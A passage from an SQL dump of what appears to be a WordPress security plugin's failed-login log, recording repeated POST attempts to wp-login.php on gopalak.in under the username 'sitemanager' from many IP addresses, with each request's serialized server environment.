orm-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745985131.6980669;s:12:\"REQUEST_TIME\";i:1745985131;}}','185.88.177.131',0,'2025-04-30 09:22:13','1970-01-01 00:00:00'),(94465,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43566\";s:11:\"REMOTE_ADDR\";s:12:\"66.29.132.42\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745985450.4452081;s:12:\"REQUEST_TIME\";i:1745985450;}}','66.29.132.42',0,'2025-04-30 09:27:32','1970-01-01 00:00:00'),(94466,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39070\";s:11:\"REMOTE_ADDR\";s:12:\"23.239.27.53\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745985775.6271729;s:12:\"REQUEST_TIME\";i:1745985775;}}','23.239.27.53',0,'2025-04-30 09:32:57','1970-01-01 00:00:00'),(94467,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:118:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36200\";s:11:\"REMOTE_ADDR\";s:14:\"185.232.41.148\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745986092.223567;s:12:\"REQUEST_TIME\";i:1745986092;}}','185.232.41.148',0,'2025-04-30 09:38:14','1970-01-01 00:00:00'),(94468,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50694\";s:11:\"REMOTE_ADDR\";s:13:\"198.27.67.210\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745986416.646848;s:12:\"REQUEST_TIME\";i:1745986416;}}','198.27.67.210',0,'2025-04-30 09:43:38','1970-01-01 00:00:00'),(94469,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"121\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47684\";s:11:\"REMOTE_ADDR\";s:13:\"157.245.6.207\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"121\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745986736.4437561;s:12:\"REQUEST_TIME\";i:1745986736;}}','157.245.6.207',0,'2025-04-30 09:48:58','1970-01-01 00:00:00'),(94470,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"120\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48088\";s:11:\"REMOTE_ADDR\";s:13:\"78.128.76.202\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"120\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745987060.5398841;s:12:\"REQUEST_TIME\";i:1745987060;}}','78.128.76.202',0,'2025-04-30 09:54:22','1970-01-01 00:00:00'),(94471,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57832\";s:11:\"REMOTE_ADDR\";s:13:\"68.65.120.171\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745987387.1853311;s:12:\"REQUEST_TIME\";i:1745987387;}}','68.65.120.171',0,'2025-04-30 09:59:49','1970-01-01 00:00:00'),(94472,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_USER_AGENT\";s:118:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39030\";s:11:\"REMOTE_ADDR\";s:12:\"94.23.61.165\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745987711.1112061;s:12:\"REQUEST_TIME\";i:1745987711;}}','94.23.61.165',0,'2025-04-30 10:05:13','1970-01-01 00:00:00'),(94473,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57162\";s:11:\"REMOTE_ADDR\";s:12:\"69.57.162.14\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745988032.0775149;s:12:\"REQUEST_TIME\";i:1745988032;}}','69.57.162.14',0,'2025-04-30 10:10:33','1970-01-01 00:00:00'),(94474,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34880\";s:11:\"REMOTE_ADDR\";s:15:\"111.229.111.163\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745988355.856215;s:12:\"REQUEST_TIME\";i:1745988355;}}','111.229.111.163',0,'2025-04-30 10:15:57','1970-01-01 00:00:00'),(94475,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 